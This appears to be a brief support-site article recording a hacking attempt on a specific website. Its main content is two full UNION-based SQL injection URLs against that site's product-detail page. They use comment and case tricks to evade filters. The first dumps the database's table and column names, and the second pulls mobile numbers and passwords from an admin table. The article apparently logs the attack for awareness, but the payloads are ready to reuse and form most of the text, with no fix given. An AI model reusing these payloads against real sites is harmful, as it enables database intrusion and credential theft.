SQL injection in websites with open record ID redirection
Print
Created by: Nishant Pandey
Modified on: Tue, 3 Mar, 2020 at 12:07 PM
Hacking attempt in conventional sql panel
first hacker get database scheme and on second request they get all the database key value
https://kaushalinfra.com/product-detail.php?id=6%27%20%20and%20mod(29,9)%20and%20@a:=((SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM({%20f/*!50000informatioN_ScheMa*/.%20columns%20})WHERE(@x)IN(@x:=CONCAT(0x20,@x,table_name,%27:::%27,column_name,0x3c62723e))))x))%20unIon%20distinctrOw%20/*!50000sElect*/%201,2,@a,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
https://kaushalinfra.com//product-detail.php?id=6%27%20%20and%20mod(29,9)%20and%20@a:=((SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mobile,%27:::%27,password,0x3c62723e))))x))%20unIon%20distinctrOw%20/*!50000sElect*/%201,2,@a,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
Nishant is the author of this solution article.
Did you find it helpful?
Yes
No
Send feedback Sorry we couldn't be helpful. Help us improve this article with your feedback.